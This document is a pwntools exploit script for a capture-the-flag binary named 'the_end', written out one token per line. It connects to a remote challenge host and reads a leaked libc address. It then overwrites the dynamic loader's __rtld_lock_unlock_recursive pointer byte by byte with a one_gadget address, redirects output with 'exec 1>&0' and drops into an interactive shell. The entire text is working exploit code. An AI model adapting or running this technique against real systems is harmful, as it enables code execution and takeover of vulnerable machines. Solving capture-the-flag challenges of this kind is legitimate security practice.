from
pwn
import
*
from
LibcSearcher
import
*
s
=
lambda
buf: io.send(buf)
sl
=
lambda
buf: io.sendline(buf)
sa
=
lambda
delim, buf: io.sendafter(delim, buf)
sal
=
lambda
delim, buf: io.sendlineafter(delim, buf)
shell
=
lambda
: io.interactive()
r
=
lambda
n
=
None
: io.recv(n)
ra
=
lambda
t
=
tube.forever:io.recvall(t)
ru
=
lambda
delim: io.recvuntil(delim)
rl
=
lambda
: io.recvline()
rls
=
lambda
n
=
2
*
*
20
: io.recvlines(n)
libc_path
=
"/lib/x86_64-linux-gnu/libc-2.27.so"
elf_path
=
"./the_end"
libc
=
ELF(libc_path)
elf
=
ELF(elf_path)
if
sys.argv[
1
]
=
=
'1'
:
context(log_level
=
'debug'
,terminal
=
'/bin/zsh'
, arch
=
'amd64'
, os
=
'linux'
)
elif
sys.argv[
1
]
=
=
'0'
:
context(log_level
=
'info'
,terminal
=
'/bin/zsh'
, arch
=
'amd64'
, os
=
'linux'
)
cho
=
''
siz
=
''
con
=
''
ind
=
''
edi
=
''
def
add(size,content
=
'
',c='
1
'):
sal(cho,c)
pass
def
free(index,c
=
''):
sal(cho,c)
pass
def
show(index,c
=
''):
sal(cho,c)
pass
def
edit(index,content
=
'
',c='
'):
sal(cho,c)
pass
def
get_proc_base(p):
proc_base
=
p.libs()[p._cwd
+
p.argv[
0
].strip(
'.'
)]
info(
hex
(proc_base))
def
get_libc_base(p):
libc_base
=
p.libs()[libc_path]
info(
hex
(libc_base))
def
exp():
global
io
io
=
remote(
"node3.buuoj.cn"
,
29679
)
ru(
"here is a gift "
)
libc.address
=
int
(r(
len
(
"0x7f7819bef2b0"
)),
16
)
-
libc.sym[
'sleep'
]
ld
=
ELF(
'/lib/x86_64-linux-gnu/ld-2.27.so'
)
ld.address
=
libc.address
+
0x3f1000
success(
"libc:"
+
hex
(libc.address))
success(
"ld:"
+
hex
(ld.address))
ogg
=
libc.address
+
0x4f322
info(
"ogg:"
+
hex
(ogg))
_rtld_global
=
ld.sym[
'_rtld_global'
]
success(
"_rtld_global:"
+
hex
(_rtld_global))
__rtld_lock_unlock_recursive
=
_rtld_global
+
0xf08
success(
"__rtld_lock_unlock_recursive :"
+
hex
(__rtld_lock_unlock_recursive))
pause()
s(p64(__rtld_lock_unlock_recursive))
s(p8(ogg&
0xff
))
info(
hex
(ogg&
0xff
))
s(p64(__rtld_lock_unlock_recursive
+
1
))
s(p8((ogg>>
8
)&
0xff
))
info(
hex
((ogg>>
8
)&
0xff
))
s(p64(__rtld_lock_unlock_recursive
+
2
))
s(p8((ogg>>
16
)&
0xff
))
info(
hex
((ogg>>
16
)&
0xff
))
s(p64(__rtld_lock_unlock_recursive
+
3
))
s(p8((ogg>>
24
)&
0xff
))
info(
hex
((ogg>>
24
)&
0xff
))
s(p64(__rtld_lock_unlock_recursive
+
4
))
s(p8((ogg>>
32
)&
0xff
))
info(
hex
((ogg>>
32
)&
0xff
))
sl(
'exec 1>&0'
)
shell()
exp()